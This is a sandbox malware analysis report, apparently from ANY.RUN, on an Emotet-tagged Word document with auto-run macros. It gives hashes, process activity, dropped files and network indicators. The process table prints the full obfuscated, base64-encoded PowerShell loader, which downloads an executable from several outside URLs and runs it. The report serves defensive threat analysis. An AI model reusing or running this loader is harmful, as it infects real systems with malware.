File name:

PO-465514-180820.doc

Full analysis: https://app.any.run/tasks/186ae75a-e938-4ca6-b46a-b0eef5666081
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 05, 2023, 15:45:59
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
generated-doc
macros
macros-on-open
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Ipsum., Author: Alexandre Riviere, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Aug 18 09:19:00 2020, Last Saved Time/Date: Tue Aug 18 09:19:00 2020, Number of Pages: 1, Number of Words: 4, Number of Characters: 24, Security: 0
MD5:

D7E6921BFD008F707BA52DEE374FF3DB

SHA1:

833BF5524A745A315C083067F2CBBF037FA35D56

SHA256:

044AA7E93EC81B297B53AAEBAD9BBAC1A9D754219B001AAF5D4261665AF30BC7

SSDEEP:

3072:fNw4PrXcuQuvpzm4bkiaMQgAlSKQg0g3Vwse:bDRv1m4bnQgISKQg0gFwse

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Reads the Internet Settings

      • powersheLL.exe (PID: 2500)

    • Executed via WMI

      • powersheLL.exe (PID: 2500)

    • The Powershell connects to the Internet

      • powersheLL.exe (PID: 2500)

    • Unusual connection from system programs

      • powersheLL.exe (PID: 2500)

  • INFO

    • Reads mouse settings

      • WINWORD.EXE (PID: 3836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: Ipsum.
Subject: -
Author: Alexandre Riviere
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2020:08:18 08:19:00
ModifyDate: 2020:08:18 08:19:00
Security: None
Company: -
CharCountWithSpaces: 27
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 4
Characters: 24
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2500powersheLL -e JABPAGcAbwB1AF8ANQAxAD0AKAAnAFEAdAA3ACcAKwAnADEAJwArACcAdABsADUAJwApADsALgAoACcAbgBlACcAKwAnAHcALQBpACcAKwAnAHQAZQBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBwAFwATwBGAEYASQBDAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIARQBjAHQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAEMAVQByAGkAVAB5AGAAUAByAE8AVABgAE8AQwBgAE8AbAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAxADIAJwArACcALAAgACcAKwAnAHQAbABzACcAKwAnADEAMQAsACAAdABsAHMAJwApADsAJABRAGEAawBmAG8AMABxACAAPQAgACgAJwBaADAAJwArACcAZgB2ADMAawBiAGcAJwApADsAJABCAHIAdgAzADUAcgBzAD0AKAAnAEUANgBoACcAKwAnADQAJwArACcAbgBrAG4AJwApADsAJABFAGMAOQB3ADQAZQAwAD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwBOACcAKwAnADMAcABPACcAKwAnAGYAZgBpAGMAZQAyADAAMQA5AE4AMwAnACsAJwBwACcAKQAuACIAcgBlAGAAUABsAGAAQQBjAEUAIgAoACcATgAzAHAAJwAsAFsAcwBUAHIAaQBOAGcAXQBbAEMASABhAFIAXQA5ADIAKQApACsAJABRAGEAawBmAG8AMABxACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAJABaAF8AagBqAGkAMwBtAD0AKAAnAE8AZwBwADUAJwArACcANwB3ACcAKwAnAGoAJwApADsAJABZADcAagBtAHgAegA4AD0AJgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBiAGMATABJAEUAbgB0ADsAJABJAG4AbgBlAHcAYwBfAD0AKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKwAnAC8ANQAnACsAJwAyACcAKwAnADUAJwArACcANQAnACsAJwAwACcAKwAnADcANQAwAC0ANQAnACsAJwA2ACcAKwAnAC0AMgAwADEAOAAwADgAMgAnACsAJwA2ADEANQAxACcAKwAnADQANQAnACsAJwAzACcAKwAnAC4AdwBlACcAKwAnAGIAcwB0AGEAcgB0AGUAJwArACcAcgB6ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBzAGEAJwArACcAdgAnACsAJwBlAHcAYQB5AGUAeABwAHIAZQBzAHMAdABoAGEAaQAnACsAJwAuACcAKwAnAGMAbwBtAC8AagAnACsAJwBuACcAKwAnAHoAZQBfADIAbwAnACsAJwAzAGoAXwBrAC8AKgBoAHQAdAAnACsAJwBwADoALwAvAG8AdQBiAGEAaQBuAGEALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAHcAJwArACcAcAAnACsAJwAtAGkAJwArACcAbgBjAGwAdQBkACcAKwAnAGUAcwAnACsAJwAvAGwAcQBrAHoAXwBuACcAKwAnAHYAcgBfACcAKwAnADEAYQAnACsAJwB2AGYANAAvACoAaAAnACsAJwB0ACcAKwAnAHQAcABzADoALwAnACsAJwAvAHcAdwB3AC4AbQBzAGIAYwAnACsAJwAuAGsAegAnACsAJwAvAGQAYQB0AGEALwBrACcAKwAnADUAJwArACcAMgA3AF8ANQAnACsAJwBfAGMAYgAnACsAJwBkAHYAdgA1AGIAaQAxADkALwAqAGgAdAB0AHAAOgAvAC8AbwAnACsAJwBrACcAKwAnAGMAJwArACcAdQAnACsAJwBwAGkAJwArACcAZABhAHQAaQBuAGcALgBjACcAKwAnAG8AbQAnACsAJwAvACcAKwAnAGkAbQAvACcAKwAnAGYAcwBxACcAKwAnAF8AZQAnACsAJwBzACcAKwAnAGoAJwArACcAXwAnACsAJwBxACcAKwAnAGcAJwArACcAeAAwADYAJwArACcAMABwAC8AKgAnACsAJwBoAHQAdABwADoALwAvACcAKwAnAGIAJwArACcAaQBrAGUALQBuAG8AbQAnACsAJwBhAGQALgBjAG8AbQAvAGMAZwBpAC0AJwArACcAYgAnACsAJwBpACcAKwAnAG4ALwA3AG4AXwAwACcAKwAnAHgAJwArACcAMABfADYAMgBtACcAKwAnAG4AegAnACsAJwB5ACcAKwAnAGgAJwArACcAOQAnACsAJwBxAC8AJwApAC4AIgBzAFAAYABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEYAZQA4AG4AZQBnADQAPQAoACcASwAnACsAJwB5ACcAKwAnAG0AcgB3ADkAdwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABNAHMAdQBvAG4AaAA4ACAAaQBuACAAJABJAG4AbgBlAHcAYwBfACkAewB0AHIAeQB7ACQAWQA3AGoAbQB4AHoAOAAuACIARABvAFcAYABOAEwAbwBBAGQAYABGAGkAYABMAEUAIgAoACQATQBzAHUAbwBuAGgAOAAsACAAJABFAGMAOQB3ADQAZQAwACkAOwAkAFUAaQAzAGwANAA5AGcAPQAoACcARABvACcAKwAnAGgAeABiACcAKwAnAHoAZwAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQARQBjADkAdwA0AGUAMAApAC4AIgBsAEUAbgBnAGAAVABoACIAIAAtAGcAZQAgADMAMQA0ADUAMQApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABFAGMAOQB3ADQAZQAwACkAOwAkAEMAdwBpAG8AXwBoADUAPQAoACcARQAnACsAJwA2AHYAcAA3AHYAdwAnACkAOwBiAHIAZQBhAGsAOwAkAFQAYQB5ADUAMABsAGsAPQAoACcAUABoADEAMABnACcAKwAnAGIAMQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUANwB0AG0AbgBrADQAPQAoACcAWQBlAHcAYwB3ACcAKwAnADgAJwArACcAawAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3836"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\PO-465514-180820.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\user32.dll
Total events
5 796
Read events
5 304
Write events
372
Delete events
120

Modification events

(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
On
(PID) Process:(3836) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1055
Value:
On
Executable files
0
Suspicious files
9
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR117E.tmp.cvr
MD5:
SHA256:
3836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$-465514-180820.docbinary
MD5:B427B08417AF5BF97F38783E6486BADC
SHA256:8D742FE4B14EDD8F175D8C2ACF08EB902A3CE6D1D89B5603137B959A416D368F
2500powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XIYFTWHUELI4C8PMDTEB.tempbinary
MD5:CAEA3B1F09925DA2A47C2B8B890AB890
SHA256:66F29B00CBB7B1DED878F96AAC6F52907C088DE194A1FD0CD6E1FF1916047549
2500powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:CAEA3B1F09925DA2A47C2B8B890AB890
SHA256:66F29B00CBB7B1DED878F96AAC6F52907C088DE194A1FD0CD6E1FF1916047549
3836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF7F82454B192FBAA3.TMPbinary
MD5:A20D9F2572E7BF761A5F9DC7E8895A9B
SHA256:952A04685FA08EB67AD1DDBAB4CD3CE7D4603767729BF688BE2988B8265D9BB8
3836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdbinary
MD5:717E9BF5941DF5CC67A60654B8EBF287
SHA256:98CF6AB77BE9CA1E7F47D0B2FE25E82BA28DBD9B3DE6FCD2C9840C62AABA9518
3836WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmbinary
MD5:BA185F6CF99EFB49DE7ED28EE970C281
SHA256:9066DF4AFC84AB94BF5EE29DAA5E851C2321534C63D2C9325CA9631F2828B808
3836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFF44A2E27B6A7E0B2.TMPbinary
MD5:AFB3D8AF39D644E9BE0A4F09B5B1D62A
SHA256:8747621E0B06C994BDF3EBF5A99A01BB26A0CE732137355F55716A275116D5C6
3836WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFC62732EE398FF893.TMPbinary
MD5:0B80DCAD8B039165577FA020C0DB7417
SHA256:3108E91DD45B5E081589942B73C2B41929D7AA5A646673A11B8D4E2011A3E6E5
2500powersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1517b8.TMPbinary
MD5:CAEA3B1F09925DA2A47C2B8B890AB890
SHA256:66F29B00CBB7B1DED878F96AAC6F52907C088DE194A1FD0CD6E1FF1916047549
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2500
powersheLL.exe
GET
404
63.247.140.170:80
http://bike-nomad.com/cgi-bin/7n_0x0_62mnzyh9q/
unknown
html
315 b
unknown
2500
powersheLL.exe
GET
404
123.253.24.22:80
http://oubaina.com/wp-includes/lqkz_nvr_1avf4/
unknown
html
4.65 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2656
svchost.exe
239.255.255.250:1900
whitelisted
2500
powersheLL.exe
123.253.24.22:80
oubaina.com
Netsec Limited
HK
unknown
2500
powersheLL.exe
195.210.46.42:443
www.msbc.kz
PS Internet Company LLC
KZ
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
2500
powersheLL.exe
63.247.140.170:80
bike-nomad.com
ASN-VINS
US
unknown

DNS requests

Domain
IP
Reputation
52550750-56-20180826151453.webstarterz.com
unknown
oubaina.com
  • 123.253.24.22
malicious
www.msbc.kz
  • 195.210.46.42
unknown
okcupidating.com
unknown
bike-nomad.com
  • 63.247.140.170
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
PO-465514-180820.doc